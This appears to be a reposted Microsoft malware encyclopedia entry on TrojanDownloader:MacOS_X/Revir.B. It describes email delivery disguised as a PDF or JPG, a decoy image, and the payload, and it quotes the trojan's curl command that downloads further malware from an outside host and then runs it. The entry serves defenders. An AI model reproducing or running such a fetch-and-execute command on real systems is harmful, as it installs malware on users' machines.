Home / malware TrojanDownloader:MacOS_X/Revir.B
First posted on 31 January 2013.
Source: MicrosoftAliases :
There are no other names known for TrojanDownloader:MacOS_X/Revir.B.
Explanation :
TrojanDownloader:MacOS_X/Revir.B may arrive on your computer as an attachment or link within an email that is sent to you. The attachment or link may appear to be a legitimate PDF or JPG file.
When you open the attachment or click the link, the trojan will run.
Installation
TrojanDownloader:MacOS_X/Revir.B drops an image file (JPG) file in the temporary folder ("~/tmp").
The trojan opens the JPG file in an attempt to hide its malicious behavior from you.
Payload
When opened, TrojanDownloader:MacOS_X/Revir.B runs from the following location:
~/tmp/host
The downloader connects to a server and downloads other malware, such as Backdoor:MacOS_X/Imuler.A, by using the following command:
curl -o /tmp/updtdata http://tarmu.narod.ru /<removed>
The trojan runs the downloaded file by using the following command:
/tmp/updtdata
Related encyclopedia entries
Backdoor:MacOS_X/Imuler.A
Analysis by Methusela Cebrian Ferrer
Last update 31 January 2013